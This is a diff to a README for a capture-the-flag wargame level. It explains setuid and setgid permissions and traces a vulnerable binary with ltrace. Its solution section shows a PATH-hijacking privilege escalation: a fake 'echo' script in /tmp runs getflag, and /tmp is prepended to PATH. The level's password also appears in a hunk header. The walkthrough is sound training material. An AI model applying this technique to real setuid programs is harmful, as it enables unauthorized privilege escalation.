show READMEs daily

README.mdx

@@ -191,10 +191,28 @@ Password: ft_waNDReL0L
 ```b
 > ls -l
 -rwsr-sr-x 1 flag03 level03 8627 level03
-   ^  ^ setuid bit & setgid bit are set
-  👉 when the binary is exec functions called inside it
-  are called under same level of permission
+ ^^^       owner flag03 can rwx also setuid bit is set
+    ^^^    group level03 can rx plus setgid bit (s) is set
+       ^^^ others can rx
+
+👉 when ./level03 is run
+  the entire process executes with the permissions of the owner
+  which means we can access resources only available to owner `flag03`
+  it also means we have access to resources limited to group `level03`
 ```
+- We may also try
+```
+> id
+uid=2003(level03) gid=2003(level03) groups=2003(level03),100(users)
+
+> namei -l ./level03 
+dr-x------ level03 level03 .
+-rwsr-sr-x flag03  level03 level03
+
+> namei -l /bin/getflag
+-rwxr-xr-x root root getflag
+```
+- `ltrace` traces library function calls when the binary is executed
 ```b
 > ltrace ./level03
   👉 we can see the `s` bit in action
@@ -207,21 +225,19 @@ setresuid(2003, 2003, 2003, 0xb7e5ee55, 0xb7fed280) = 0
 system("/usr/bin/env echo Exploit me" ...
 
 ### observations
-  👉 getegid & geteuid return a effective group/user ID ie. 2003
-  👉 setresgid & setresuid set Real/Effective/Saved ID to ensure
-  that the process maintains privileges
-  👉 `/usr/bin/env echo` uses a vulnerable relative path
-  since ./level03 has high privileges,
-  we can fake a false echo to run getflag inside ./level03
-```
-```b
-> whereis getflag
-getflag: /bin/getflag
+👉 getegid & geteuid return a effective group/user ID 2003 
+  which is my `id` as `level03`
+👉 but as privileges are elevated during the process
+  we have temporary permissions as `flag03`
+👉 this way we can exploit the `/usr/bin/env echo`
+  relative path vulnerability
 ```
 
 - Solution
 
 ```b
+> whereis getflag
+getflag: /bin/getflag
 > echo -e "#\!/bin/bash\n/bin/getflag" > /tmp/echo
 > chmod +x /tmp/echo
 > export PATH=/tmp:$PATH  👈 prepend tmp to get it checked first